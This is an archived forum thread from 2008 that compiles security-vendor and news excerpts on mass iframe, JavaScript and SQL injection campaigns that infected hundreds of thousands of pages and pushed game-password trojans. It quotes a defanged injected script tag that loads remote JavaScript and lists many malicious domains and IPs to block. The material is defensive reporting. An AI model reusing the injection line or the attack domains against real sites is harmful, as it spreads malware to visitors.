View Full Version : Thousands of sites infected - archive

2008-03-11, 11:15

Macvirus.org site compromised
- http://sunbeltblog.blogspot.com/2008/03/oops-macvirusorg-hosting-porno-malware.html
March 10, 2008 - "...Macvirus.org, a website dedicated to “keeping an eye on Mac viruses”, has had their discussion forums seeded with vast amounts of forum spam pushing various junk and lots of hardcore porn, including a number pushing malware (fake codecs)... pushing fake codecs for -both- Mac and Windows platforms (the site serving the fake codec simply detects your user agent and delivers the appropriate malware)..."
(Screenshots available at the URL above.)


Annual Weblog Awards ("Bloggies") site compromised
- http://blog.trendmicro.com/bloggies-gives-out-malware-before-awards/
March 10, 2008 - "...The Web site of the Annual Weblogs Awards — more informally known as the Bloggies — was hacked recently, serving up a malicious Javascript to its visitors. This happened on the eve of the award ceremony, as reported in NEWS.com.au*. Upon loading, the site reportedly connects to the URL hxxp ://www.{BLOCKED}nwww.biz/1/1/ice-pack/ index.php that Trend Micro researchers have verified to be malicious. It downloads the file INDEX.PHP, which is detected as JS_PSYME.ANT. This JavaScript Quicktime exploit in turn connects to the URL hxxp ://{BLOCKED}nwww.biz/1/1/ice-pack/ exe.php to download a file that is detected as TROJ_DROPPER.XX. Whoever orchestrated this attack played on timing, knowing that people would more likely visit the Bloggies Web site on the eve of the awarding ceremony itself. Unfortunately, safe surfing measures can be useless as even the most trusted Web sites can be hacked to serve up malware... Trend Micro advises surfers to keep their software updated, especially their AV products to evade infection."
* http://www.news.com.au/technology/story/0,25642,23345956-5014108,00.html
(Screenshots available at both URLs above.)


2008-03-13, 14:29

- http://www.avertlabs.com/research/blog/index.php/2008/03/12/another-mass-attack-underway/
March 12, 2008 - "On the heels of recent iframe attacks, we’re currently tracking another mass compromise. This attack involves injection of script into valid web page to include a reference to a malicious .JS file (sometimes in the BODY, other times in the TITLE section). The .JS file uses script to write an IFRAME, which loads an HTML file that attempts to exploit several vulnerabilities, including:
* MS06-014
* RealPlayer (ActiveX Control)
* Baofeng Storm (ActiveX Control)
* Xunlei Thunder DapPlayer (ActiveX Control)
* Ourgame GLWorld GlobalLink Chat (ActiveX Control)
This is one of those cascading threats, where one page leads to another and another, which leads to an executable, which leads to another and another. At least one of the payload trojans targets online gamers. Preliminary research results suggest more than 10,000 pages were affected by this hack attack..."
(Screenshot available at the URL above.)

- http://preview.tinyurl.com/2l3b99
March 13, 2008 (Computerworld) - "...The Web attack, which appears to be a coordinated effort run out of servers in China, was first noticed by McAfee researchers on Wednesday morning. Within hours, the security company had tracked more than 10,000 Web pages infected on hundreds of Web sites... This same technique was used a year ago, when attackers infected the Web sites of the Miami Dolphins and Dolphins Stadium just prior to the 2007 Super Bowl XLI football game. The attack code takes advantage of bugs that have already been patched, so users whose software is up-to-date are not at risk. However, McAfee warns that some of the exploits are for obscure programs such as ActiveX controls for online games, which users may not think to patch. If the code is successful, it then installs a password-stealing program on the victim's computer that looks for passwords for a number of online games..."


2008-03-13, 15:42

- http://www.theregister.co.uk/2008/03/13/mass_compromise/
13 March 2008 - "...Compromised web pages include travel sites, government websites, and hobbyist sites that have been modified with JavaScript code that silently redirects visitors to a site in China under the control of hackers. Miscreants likely reprogrammed the web pages after scanning the net for insecure servers. The malware cocktail attempts to exploit vulnerabilities in Windows, RealPlayer, and other applications to break into insecure PCs... Components of the malware attempt to steal passwords to online games while others leave a back door that allows the installation of additional malicious programs... A single organisation or small group is likely behind this attack, as the malicious code on all these pages is served up from the same server in China..."


2008-03-13, 21:10
Apparently, still in use:

- http://www.finjan.com/Content.aspx?id=1367
(Malicious Page of the Month - synopsis - January 2008)
"...More than 10,000 websites in the US were infected in December by a new variant of (a) crimeware toolkit. The attack, which Finjan has designated 'random js toolkit', is an extremely elusive crimeware Trojan that infects an end user’s machine and sends data from the machine via the Internet to the Trojan's “master”, a cybercriminal."

- http://www.us-cert.gov/current/#website_compromises_facilitating_exploitation_of
March 13, 2008


2008-03-14, 03:41

- http://preview.tinyurl.com/39s9kz
March 13, 2008 (Computerworld) - "Antivirus vendor Trend Micro Inc. confirmed Thursday that "some portions" of its site had been hacked earlier this week, but hedged when asked if those pages had been serving up attack code to unsuspecting visitors... The English-language edition of the Yomiuri Shimbun, one of Japan's largest newspapers, said Trend Micro's site was hacked around 9:00 p.m. Sunday, Tokyo time (7:00 p.m. Eastern, on Saturday, in the U.S.)... The alert also said that users could have been infected by accessing one of 11 infected pages on the Japanese site or 20 pages on the English site, or by clicking a link embedded in the malware's name. All the pages were part of Trend Micro's malware encyclopedia, a searchable database of viruses, Trojans and worms. Sweeny, Trend's U.S. spokesman said "about 32" pages were involved, "most of them from the encyclopedia." Other reports speculated that the Trend Micro hack was part of the larger campaign that has infected some 20,000 pages in the past few days. According to researchers at McAfee Inc., those hacks are script-injection attacks that reference JavaScript attack code..."
* http://www.sophos.com/security/blog/2008/03/1186.html
"...According to reports in the Japanese media, a number of webpages on the firm’s Japanese and English-language website were altered by hackers on Sunday 9 March, who used a malicious iFrame exploit to deliver a Trojan horse onto surfers’ computers. Trend Micro is believed to have uncovered the problem on Wednesday 12 March and replaced affected pages with a message saying “This page is temporarily shut down for emergency maintenance”... It is believed that a SQL vulnerability on the site was exploited by the hackers... In a nutshell - what has happened here is a criminal act, and our friends at Trend Micro (and people visiting the hacked pages) are victims of the crime... This isn’t the time or place to make cheap shots against a competitor... Sophos discovers a new infected webpage every 14 seconds..."


2008-03-14, 13:38

- http://preview.tinyurl.com/3xs996
March 13, 2008 (AvertLabs blog) - "Yesterday we uncovered a newer mass hack affecting over 10,000 web pages. That number has since doubled. Today, I took a look at another recent mass attack, which was similar to those reported by Dancho Danchev, but reference a JS file rather than an IFRAME. The attack seems to have started more than a week ago, and nearly 200,000 web pages have been found to be compromised, most of which are running phpBB. This contrasts yesterday’s attack in that the vast majority of those were active server pages (.ASP). The ASP attacks are different than the phpBB ones in that the payload and method are quite different. Various exploits are used in the ASP attacks, where the phpBB ones rely on social engineering. phpBB mass hacks have occurred in the past, including those done by the Perl/Santy.worm back in 2004..."


2008-03-14, 17:09

- http://isc.sans.org/diary.html?storyid=4139
Last Updated: 2008-03-14 16:28:06 UTC ...(Version: 2)
Over 10,000 legitimate websites [should read "pages"?] have been compromised and now have an iframe that will direct visitors to a malicious website hosted on 2117966.net. The malicious website attempts to exploit the vulnerability described in MS06-014 MS07-004, MS06-067, MS06-057 and a number of ActiveX vulnerabilities. Successful exploitation result in the installation of a password-stealing malicious program that attempts to steal the logon credentials from websites and online games.
- Recommended immediate action:
Block 2117966.net at your web proxy
- Recommended follow-up action:
Inspect your web proxy logs for visitors to 2117966.net. This will indicate who is potentially exposed. Check these systems to verify that their patches are up-to-date. Systems that are successfully compromised will begin sending traffic to ( http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080313 ). Search your proxy logs for systems generating those requests and reimage the infected machines.
- Protecting Browsers:
A properly-patched system should not be at-risk from this attack. It is recommened to use a browser that does not support ActiveX..."

* http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080313#toc1
"...2117966.net - Please do NOT visit this website, it should be considered dangerous..."

- http://www.us-cert.gov/current/current_activity.html#website_compromises_facilitating_exploitation_of
updated March 14, 2008 at 12:56 pm (EDT)
"...This issue is currently exploiting a variety of vulnerabilities:
* Baofeng Storm ActiveX
* Ourgame GLChat ActiveX
* Microsoft Internet Explorer VML (VU#122084)
* Qvod Player ActiveX
* Microsoft RDS.Dataspace ActiveX (VU#234812)
* RealPlayer playlist ActiveX (VU#871673)
* Storm Player ActiveX
* Microsoft Windows WebViewFolderIcon ActiveX (VU#753044)
* Xunlei Thunder DapPlayer ActiveX ...

- http://isc.sans.org/diary.html?storyid=4139
Last Updated: 2008-03-16 14:21:29 UTC ...(Version: 4)
"Update: this was misidentified as an iframe injection when in fact it was a javascript link on the altered ASP* pages."
* Active Server Page(s) (Microsoft web scripting language and file extension)

('Still, block that URL.)


2008-03-15, 18:59

The -Other- iframe attack...
- http://isc.sans.org/diary.html?storyid=4144
Last Updated: 2008-03-15 17:23:13 UTC - "...The 2117966.net (please, do NOT visit that site) campaign affected approximately 13,800 ASP pages. No php pages.

>>> This -other- attack is reported to have affected around 200,000 phpBB pages. It's a bigger attack and very important, you should read Dancho's blog, it has IP addresses and domains to look for in your logs as well as what traffic an infected system will generate. If you're a website administrator, also take a close read of his 04-MAR-2008 entry:
Pay particular attention to how they're inserting the code into the site (from Dancho's Blog):
"(The sites) themselves aren't compromised, their SEO practices of locally caching any search queries submitted are abused. Basically, whenever the malicious attacker is feeding the search engine with popular quaries, the sites are caching the search results, so when the malicious party is also searching for the IFRAME in an "loadable state" next to the keyword, it loads. Therefore, relying on the high page ranks of both sites, the probability to have the cached pages with the popular key words easy to find on the major search engines, with the now "creative" combination of the embedded IFRAME, becomes a reality if you even take a modest sample, mostly names."

This is important. It's not obvious to me how to fix the problem..."


2008-03-17, 10:57

IFRAME redirects...
- http://www.networkworld.com/news/2008/031308-hackers-launch-massive-iframe.html
03/16/2008 - "...Danchev* listed more than 20 sites that together account for more than 401,000 IFRAME-injected pages... he had identified more than 100 bogus .info domains that were acting as the second-stage redirectors. Trace it back far enough, and the path leads to the Russian Business Network (RBN)... "What this means is that known Russian Business Network netblocks are receiving all the re-routed DNS queries from infected hosts, thereby setting up the foundations for a large scale pharming attack"... If users rejected the bogus call to install the codec, the string is broken, and no harm can come to them. Web site operators, on the other hand, can take a number of steps, including properly sanitizing all user input or not caching previous searches..."
* http://ddanchev.blogspot.com/2008/03/more-high-profile-sites-iframe-injected.html
March 12, 2008 - "...a new malware variant of Zlob is attempting to install though an ActiveX object. These are the high profile sites targeted by the same group within the past 48 hours, with number of locally cached and IFRAME injected pages within their search engines..."

** http://ddanchev.blogspot.com/2008/03/wiredcom-and-historycom-getting-rbn-ed.html
March 10, 2008 - "...The attack is still ongoing, this time successfully injecting a multitude of new domains into Wired Magazine, and History.com's search engines, which are again caching anything submitted, particularly not validated input to have the malicious parties in the face of the RBN introducing a new malware..."

Example: http://ca.com/us/securityadvisor/pest/pest.aspx?id=453119651
Latest DAT Release 03 13 2008 - "This fake codec is actually a hijacker that will change your DNS settings whether you are aquire your IP settings through DHCP or set your IP information manually. This hijacker will attempt to re-route all your DNS queries through 85.255.x.29 or 85.255.x.121 (RBN).... rogue DNS servers..."


2008-03-18, 22:36

MSNBC is latest victim in mass javascript injection
- http://www.websense.com/securitylabs/alerts/alert.php?AlertID=848
March 18, 2008 - "... the official Web site of MSNBC Sports has been compromised with malicious code. This same attack has compromised dozens of other high-profile sites such as ZDNet, archive.org, wired.com, and history.com. We have notified the owners of MSNBC of the malicious content on their site. This attack has been discussed in our previous blog*. It is important to note that the hub site that is hosting the malicious JavaScript is currently down...
(Other) References:
* http://www.websense.com/securitylabs/blog/blog.php?BlogID=179
** http://ddanchev.blogspot.com/2008/03/zdnet-asia-and-torrentreactor-iframe-ed.html ..."

(Screenshot available at the Websense URL above.)


2008-03-19, 01:46
Have a look...

Malicious site: MSNBC Sports compromised
1- http://www.websense.com/securitylabs/alerts/alert.php?AlertID=848
March 18, 2008

Spammers using Google ads to redirect users to Malware:
2- http://preview.tinyurl.com/2opnkh
March 17, 2008 (McAfee Avert Labs)

IFRAME redirects...
3- http://www.networkworld.com/news/2008/031308-hackers-launch-massive-iframe.html
March 16, 2008 - "...Danchev* listed more than 20 sites that together account for more than 401,000 IFRAME-injected pages... he had identified more than 100 bogus .info domains that were acting as the second-stage redirectors. Trace it back far enough, and the path leads to the Russian Business Network (RBN)..."
* http://ddanchev.blogspot.com/2008/03/more-high-profile-sites-iframe-injected.html
March 12, 2008

Shadowserver report: I/P in China serving malicious javascript...
4- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080313#toc1
March 13, 2008 - ...in conjunction/coordination with:
4A- http://www.us-cert.gov/current/#search_engine_iframe_injection_attacks
updated March 14, 2008
4B- http://www.us-cert.gov/current/#website_compromises_facilitating_exploitation_of
updated March 14, 2008

(Multiple sites) ...getting RBN-ed
5- http://ddanchev.blogspot.com/2008/03/wiredcom-and-historycom-getting-rbn-ed.html
March 10, 2008 - "...The attack is still ongoing, this time successfully injecting a multitude of new domains into Wired Magazine, and History.com's search engines, which are again caching anything submitted, particularly not validated input to have the malicious parties in the face of the RBN introducing a new malware..."
Example: http://ca.com/us/securityadvisor/pest/pest.aspx?id=453119651

More to come...


2008-03-20, 17:45

- http://www.symantec.com/avcenter/threatcon/learnabout.html
(03.20.2008) - "...DeepSight Threat Analyst Team is currently monitoring a number of ongoing mass SQL-injection attacks that are manipulating victim servers to host malicious content to browsing clients.
- A number of these attacks are currently being carried out. One attack involves a failure to sanitize cached search results, allowing malicious HTML to be injected into search result pages. This has affected a number of high-profile sites and has been thoroughly documented by the researcher who originally discovered the attacks: ( http://ddanchev.blogspot.com/2008/03/more-high-profile-sites-iframe-injected.html )
- Another attack is currently targeting servers running vulnerable ASP scripts that can be exploited through SQL injection to host malicious HTML code. The injected code references a malicious script... which in turn injects an IFRAME into the page to redirect users to a site that tries to exploit various known and patched vulnerabilities. This attack is believed to have affected over 15,000 pages, but the number of unique servers compromised may be far less.
- Yet another large-scale attack involving SQL injection is targeting servers running PHPBB. This attack injects HTML code that loads a malicious JavaScript file from 'free.hostpinoy.com'. Reports indicate that this attack is much more prevalent, perhaps because of the ubiquity of PHPBB. Over 150,000 pages may be affected. Note again, however, that the number of unique servers compromised may be far less. In previously observed cases, over 5000 pages have been affected on a single domain. At the time of writing, most of the sites hosting the exploits or malicious JavaScript are down, but they may come back online at any time. Administrators are advised to audit their web services to ensure that no exploitable flaws exist in the publicly exposed scripts and that the latest versions are installed. Network admins are advised to block access to '2117966.net' and 'free.hostpinoy.com' at the gateway.

Clients are advised to browse using strict security policies. The following list of strategies may prevent or hamper an attack:
- Run browser software with the least privileges possible.
- Disable JavaScript, IFRAMEs, and ActiveX controls.
- Enable OS security mechanisms such as Data Execution Prevention (DEP).
- Ensure that browsing software is up to date.
- Filter all web activity through security products such as an Intrusion Prevention system."

EDIT/ADD: http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080320
20 March 2008 - "...In our last post we mentioned the several thousands of websites that were SQL injected to reference malicious JavaScript code on 2117966.net. At the time we were actually just taking an educated guess that this was the result of SQL injection. However, it has since been confirmed... It turns out this is the same IP address that carried out the SQL injection attacks related to the uc8010.com incident*. Not very subtle are they? You might want to keep an eye out for the IP"
* http://isc.sans.org/diary.html?storyid=3823

(Please do NOT visit any of those IP's in the commentary - they all should be considered dangerous.)


2008-03-31, 03:01

- http://www.sophos.com/security/blog/2008/03/1243.html
30 March 2008 - "...Our data for all records processed since March 1st 2008 (so approximately 4 weeks worth of data). The data reveals almost 11,000 pages compromised with Troj/Unif-B, split across approximately 4,500 different domains. That is a fair amount of activity, approximately 150 new domains each day (and this is just what we are seeing)... For the 4,500 compromised domains, these targets fall into two categories:
1. additional attack sites. Some other site which hits the victim with exploits.
2. redirect or ‘control’ sites. Some other site, controlled by the attacker, which can be used to direct traffic (as discussed previously). Typically, these sites direct victims to one of several other attack sites (though there may be several redirects in use). There a number of prominent attacks visible in the data:
* ~30% use a renowned attack site for installing various malware including Mal/Dropper-T, Mal/EncPk-CM and Mal/EncPk-CO.
* Tibs: over 10% are redirect sites under the control of a large and well coordinated group. Numerous domains have been used by this group in recent months to install a variety of Dorf, Tibs and other malware.
* Zbot: almost 10% load exploits intended to install a member of the Mal/Zbot family.
* Gpack: approximately 5% point to a single GPack attack site, which installs malware detected as Mal/Emogen-Y.
....something recently talked about by Roger Thompson, on the Exploit Prevention Labs blog*... As speculated previously ( http://www.sophos.com/images/sophoslabs-blog/2008/02/map.png ), it is not unlikely that these sites could be used to make money by selling ‘traffic flow’ (attackers essentially paying for victims to be directed to their attack sites for a period of time)..."

* http://explabs.blogspot.com/2008/03/gpack.html
March 28, 2008 - "...It's just javascript, and thus far, we've only seen one exploit come out of it ... a mouldy, old MS06-014, although we expect there are more than that... while there is clearly more than one set of Bad Guys involved, most of them seem to being hosted by the same ISP, because the exploit IPs are similar..."


2008-04-12, 15:55

Election time in Italy, complete with Trojan
- http://preview.tinyurl.com/52adbn
April 11, 2008 - "Symantec has been notified that the Web site ladestra.info, a site related to a right-wing Italian political party, has been compromised. The Web site is hosting a malicious iframe that leads to a typical browser exploit using the Neosploit tool, which forces an infected computer to install the newest version of Trojan.Mebroot. Using elections as a channel for spreading malicious code is something we have already seen (for example, Srizbi*) and it’s now election time in Italy as well, with the vote set to happen next Sunday and Monday, April 13th and 14th, 2008. Nonetheless, unless the Mebroot gang is interested in Italian politics, I do not believe the Web site has been compromised for political reasons. We have recently seen the group uploading malicious iframes** on many different Web sites for their purposes, with complete disregard for the content..."
* http://preview.tinyurl.com/2349ds

** http://preview.tinyurl.com/yrxcym


2008-04-22, 22:32

- http://securitylabs.websense.com/content/Alerts/3070.aspx
04.22.2008 - "...malicious JavaScript injection that compromised thousands of domains at the start of this month, just 2-3 weeks ago. The attackers have now switched over to a new domain as their hub for hosting the malicious payload in this attack. We have no doubt that the two attacks are related... In the last few hours we have seen the number of compromised sites increase by a factor of ten. This mass injection is remarkably similar to the attack we saw earlier this month. When a user browses to a compromised site, the injected JavaScript loads a file named 1.js which is hosted on hxxp ://www.nihao[removed].com The JavaScript code then redirects the user to 1.htm (also hosted on the same server). Once loaded, the file attempts 8 different exploits (the attack last April utilised 12). The exploits target Microsoft applications, specifically browsers not patched against the VML exploit MS07-004 as well as other applications. Ominously files named McAfee.htm and Yahoo.php are also called by 1.htm but are no longer active at the time of writing. There are further similarities too between the two mass attacks. Resident on the latest malicious domain is a tool used in the execution of the attack. An analysis of that tool can be found in the ISC diary entry here*... It appears that same tool was used to orchestrate this attack too. When we first started tracking the use of this domain, the malicious JavaScript was still making use of hxxp ://www.nmida[removed].com/... Sites of varying content have been infected including UK government sites, and a United Nations website as can be seen by the Google search... The number of sites affected is in the hundreds of thousands..."
* http://isc.sans.org/diary.html?n&storyid=4294
Last Updated: 2008-04-16 19:14:00 UTC


2008-04-24, 23:03

Hundreds of thousands of SQL injections
- http://isc.sans.org/diary.html?storyid=4331
Last Updated: 2008-04-24 19:36:50 UTC - "UPDATE.
It is recommend that you block access to hxxp :/www .nihaorr1.com and the IP it resolves to 219DOT153DOT46DOT28 at the edge or border of your network.
1.js is the file they are currently injecting. That could change and has been injected into thousands of legitimate websites. Visitors to this website are “treated” to 8 different exploits for many windows based applications including AIM, RealPlayer, and iTunes. DO NOT visit sites that link to this site as you are very likely to get infected. Trendmicro named the malware toj_agent.KAQ it watches for passwords and passes them back to contoller’s ip.
The crew over at shadowserver has published additional information related to SQL injected sites. They included the botnet controllers IP address and a content based snort signature for the bot control traffic that is not ip dependent. The bot controller is alive and communicating on port 2034 with some infected clients at this time.
They have hit city websites, commercial sites and even government websites. This type of injection pretty much null and voids the concept of “trusted website”. or "safe sites".
The register covered it stating their search returned 173k injected results:
The number I received doing the same search was 226k. Those are not all unique websites. Many sites got hit more then one time.
Lou a self described “accidental techie” has been discussing it as they have been reinjecting this into his database/website “every other day”. http://www.experts-exchange.com/Database/MySQL/Q_23337211.html
Websense has good information on it here:
We covered the injection tool, the methods to prevent injections and other details here:
http://isc.sans.org/diary.html?storyid=4294 ..."


2008-04-25, 17:47
FYI... (DO NOT visit the the sites mentioned in the commentary as you are very likely to get infected - BLOCK them, but don't go there.)

- http://www.f-secure.com/weblog/archives/00001427.html
April 24, 2008 - "...As more and more websites are using database back-ends to make them faster and more dynamic, it also means that it's crucial to verify what information gets stored in or requested from those databases — especially if you allow users to upload content themselves which happens all the time in discussion forums, blogs, feedback forms, et cetera. Unless that data is sanitized before it gets saved you can't control what the website will show to the users. This is what SQL injection is all about, exploiting weaknesses in these controls... It finds all text fields in the database and adds a link to malicious javascript to each and every one of them which will make your website display them automatically. So essentially what happened was that the attackers looked for ASP or ASPX pages containing any type of querystring (a dynamic value such as an article ID, product ID, et cetera) parameter and tried to use that to upload their SQL injection code. So far three different domains have been used to host the malicious content — nmidahena .com, aspder .com and nihaorr1 .com. There's a set of files that gets loaded from these sites that attempts to use different exploits to install an online gaming trojan. Right now the initial exploit page on all domains are unaccessible but that could change. So if you're a firewall administrator we recommend you to block access to them.
So what should you do?
- First of all, search your website logs for the code above and see if you've been hit. If so, clean up your database to prevent your website visitors from becoming infected.
- Second, make sure that all the data you pass to your database is sanitized and that no code elements can be stored there.
- Third, block access to the sites above.
- Fourth, make sure the software you use is patched...
- Fifth, keep your antivirus solution up-to-date."

(Note: per http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080424 : "...nmidahena.com... domain has since been killed off and looks like our attacker has moved on to some new ones... it most likely won't take too long for others to catch on and possibly conducting even more nefarious activities. If your site has fallen victim to one of these attacks, it's not just important you remove the offending injections, but it's even more important you fix the SQL injection attack vector. If you do not, your website will continue to be vulnerable to similar or worse attacks.")

(...where the other factors enter in)
- http://preview.tinyurl.com/6c8bet - 04/24/2008 (Networkworld) - "... SQL injection attacks on Microsoft Internet Information Servers are leaving Web pages with malicious -iFrames- in them... Web pages are infected with the iFrame code by looking for a specific code string in the source code of the Web page associated to an iFrame tag..."


2008-04-26, 13:53
For clarification:

(Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.)

>>> http://www.f-secure.com/weblog/archives/00001427.html
April 24, 2008 - "...So far three different domains have been used to host the malicious content
— nmidahena .com*, aspder .com and nihaorr1 .com.
There's a set of files that gets loaded from these sites that attempts to use different exploits to install an online gaming trojan. Right now the initial exploit page on all domains are unaccessible but that could change. So if you're a firewall administrator we recommend you to block access to them..."

4.26.2008 - NOW
- http://centralops.net/co/DomainDossier.aspx
aspder .com ***
country: CN
nihaorr1 .com ***
country: CN
nmidahena .com *
Could not find an IP address for this domain name.
* (Note: per http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080424 : "...nmidahena.com... domain has since been killed off and looks like our attacker has moved on to some new ones...)


2008-05-07, 12:59

- http://isc.sans.org/diary.html?storyid=4393
Last Updated: 2008-05-07 05:12:53 UTC - "A loyal ISC reader... wrote in to point us at what looks to be a SQL Injection worm that is on the loose. From a quick google search it shows that there are about 4,000 websites infected and that this worm started at least mid-April if not earlier. Right now we can't speak intelligently to how they are getting into databases, but what they are doing is putting in some scripts and iframes to take over visitors to the websites. It looks like the infection of user machines is by Real Player vulnerabilities that seem more or less detected pretty well. The details, the script source that is injected into webpages is hxxp ://winzipices .cn /#.js (where # is 1-5). This, in turn, points to a cooresponding asp page on the same server. (i.e. hxxp :// winzipices .cn/#.asp). This in turn points back to the exploits. Either from the cnzz .com domain or the 51 .la domain. The cnzz .com (hxxp ://s141 .cnzz .com) domain looks like it could be set up for single flux, but it's the same pool of IP address all the time right now. hxxp ://www .51 .la just points to 51la .ajiang .net which has a short TTL, but only one IP is serving it.
Fair warning, if you google this hostnames, you will find exploited sites that will try and reach out and "touch" you... even if you are looking at the "cached" page. Proceed at your own risk.
UPDATE: We're also see this website serving up some attacks in connection with this SQL Worm
(hxxp ://bbs .jueduizuan .com)"


2008-05-07, 21:01

- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080507
7 May 2008
"Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.

As predicted, the attacks against ASP and ASP.NET pages via SQL injection have continued. This time the domain name "winzipices.cn" is in the spotlight. It has managed to find itself in the source of over 4,000 pages according to Google. ISC has also has a short diary today mentioning this attack here. It turns out this is also something we have been taking a look at now for a few days. With that being said, we would like to share some information that can help protect end users and organizations. It would appear that our attackers in this instance are taking advantage of the same issues we have discussed in some of our recent postings. However, we do know that the malware and malicious file trail here are different than the last few attacks. If your websites has been hacked or you are visiting a hacked website, you will find something like this in your HTML source in the page you visit:
"<script src=hxxp ://winzipices .cn/ 5.js></script>"
It appears that 1.js, 2.js, 3.js, and 4.js are also present. Each of these files in turn have hidden iframes...
Malware Binaries:
File MD5: 8ca53bf2b7d8107d106da2da0f8ca700 (test.exe)
File Size: 28301 bytes
File MD5: 5c9322a95aaafbfabfaf225277867f5b (1.exe)
File Size: 38400 bytes
Protection & Detection
As always we recommend that you block access to the malicious domains and sites. Using a content filter, changing DNS entries, and blocking IP addresses are all valid methods. Of course being up-to-date on your patches can also go a long way. Here's a quick recap of the malicious sites/IP addresses involved in this attack:
-winzipices.cn []
Note that blocking by IP address could potentially block other legitimate pages on the host (not likely in this case). It's also generally only valid or helpful for a short period of time as attackers frequently change both IP addresses and domain names."


2008-05-10, 10:47
(Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.)

SQL injection continues
- http://www.f-secure.com/weblog/archives/00001432.html
May 10, 2008 - "...The attacks have now started again, this time pointing to several different domains. During the last few days we've seen the same type of encoded SQL script as in the previous case being inserted into ASP/ASP.NET pages. The scripts point to the following domains:
yl18 .net
www .bluell .cn
www .kisswow .com .cn
www .ririwow .cn
winzipices .cn
All of the domains above are pointing to IP addresses in China. Just like last time the scripts try to use several exploits to infect the user's computer."

- http://blog.trendmicro.com/more-than-a-half-a-million-web-sites-compromised/
May 10, 2008 - "...some several thousands of Web sites try to recover from being hacked via SQL injection barely two days ago, in comes another massive attack on more than half a million Web sites. Advanced Threats Research Program Manager Ivan Macalintal found the malicious script JS_SMALL.QT injected into various Web sites believed to be either using poorly implemented phpBB, or are using older, exploitable versions of the said program... In true ZLOB fashion, this variant poses as a video codec installer... These types of Trojans are known for changing an affected system’s local DNS and Internet browser settings, thus making the system vulnerable for even more potential threats..."


2008-05-12, 03:51

Mass File Injection Attack
- http://isc.sans.org/diary.html?storyid=4405
Last Updated: 2008-05-11 21:48:56 UTC - "We received a report... this afternoon about a couple of URLs containing a malicious JavaScript that pulls down a file associated with Zlob. If you do a google search for these two URLs, you get about 400,000 sites that have a call to this Javascript file included in them now. The major portion of the sites seem to be running phpBB forum software.
If you have a proxy server that logs outbound web traffic at your site, you might want to look for connection attempts to these two sites. Internal clients that have connected may need some cleanup work. Another preventive step would be to blacklist these two URLs.

hxxp ://free .hostpinoy .info /f.js
hxxp ://xprmn4u.info /f .js "


2008-05-13, 17:48

- http://www.techworld.com/security/news/index.cfm?newsID=101475&pagtype=all
13 May 2008- "..."This is an on-going campaign, with new domains [hosting the malware] popping up even this morning," said Paul Ferguson, a network architect with anti-virus vendor Trend Micro. "The domains are changing constantly." According to Ferguson, over half a million legitimate websites have been hacked by today's mass-scale attack, only the latest in a string that goes back to at least January. All of the sites, he confirmed, are running "phpBB", an open-source message forum manager... Visitors to a hacked site are redirected through a series of servers, some clearly compromised themselves, until the last in the chain is reached. That server then pings the PC for any one of several vulnerabilities, including bugs in both Internet Explorer and the RealPlayer media player. If any of the vulnerabilities are present, the PC is exploited and malware is downloaded to it..."
* http://preview.tinyurl.com/6f2uro
Apr 07, 2008 - "phpBB 3.0.1 released... critical bugs fixed..."


2008-05-14, 12:23
Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.

SQL Injection Attacks Becoming More Intense
- http://www.f-secure.com/weblog/archives/00001435.html
May 13, 2008 - "The mass SQL injection attacks... are increasing in number and we're seeing more domains being injected and used to host the attack files. We believe that there is now more than one group using a set of different automated tools to inject the code. Previously, these attacks have primarily pointed to IP addresses in China and we've seen the following domains being used in addition to the ones we've mentioned previously:
www .wowgm1 .cn
www .killwow1 .cn
www .wowyeye .cn
vb008 .cn
9i5t .cn
computershello .cn
We've now seen other domains being used as well such as direct84 .com which is inserted by an SQL injection tool (detected as HackTool:W32/Agent.B) distributed to the Asprox botnet. SecureWorks has a nice write-up available*. The direct84 .com domain fast-fluxes to several different IPs in Europe, Israel and North America. The injected link eventually leads to a backdoor detected as Backdoor:W32/Agent.DAS. This is a good time to again mention that it's not a vulnerability in Microsoft IIS or Microsoft SQL that is used to make this happen. If you are an administrator of a website that is using ASP/ASP.NET, you should make sure that you sanitize all inputs before you allow it to access the database. There are many articles on how to do this such as this one**. You could also have a look at URLScan*** which provides an easy way to filter this particular attack based on the length of the QueryString."

* http://www.secureworks.com/research/threats/danmecasprox/
May 13, 2008 - "...the SQL attack tool does not spread on its own, it relies on the Asprox botnet in order to propagate to new hosts..."

** http://msdn.microsoft.com/en-us/library/ms998271.aspx

*** http://www.microsoft.com/technet/security/tools/urlscan.mspx

Also see: http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080513
May 13, 2008


2008-05-14, 20:57
(Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.)

Full list of Injected Sites
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080514
Posted May 14, 2008, at 07:42 AM - "Below is a list of domains used in the mass SQL injections that insert malicious javascript into websites. We've also included an approximate number of pages infected (according to Google). Note that these numbers decay with time. Some of these domains were injected long ago and have been cleaned. At their height, their numbers may have been larger.

www .nihaorr1 .com -468,000
free .hostpinoy .info -444,000
xprmn4u .info -369,000
www .nmidahena .com -140,000
winzipices .cn -75,000

www .aspder .com -62,000
www .11910 .net -47,000
bbs .jueduizuan .com -44,000
www .bluell .cn -44,000
www .2117966 .net -39,000

xvgaoke .cn -33,000
www .414151 .com -17,000
yl18 .net -15,000
www .kisswow .com .cn -13,000
c .uc8010 .com -9500

www .ririwow .cn -6000
www .killwow1 .cn -4000
www .wowgm1 .cn -3500
www .wowyeye .cn -2800
9i5t .cn -2500

computershello .cn -2300
b15 .3322 .org -1200
www .direct84 .com -1100
smeisp .cn -85
free .edivid .info -40
h28 .8800 .org -34

ucmal .com -30
usuc .us -13
www .wowgm2 .cn -8
www .adword72 .com -2

=> Posted May 14, 2008, at 07:42 AM.

